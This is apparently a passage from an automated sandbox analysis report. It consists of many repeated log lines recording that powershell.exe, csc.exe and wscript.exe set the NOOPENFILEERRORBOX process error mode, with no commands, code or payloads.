              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
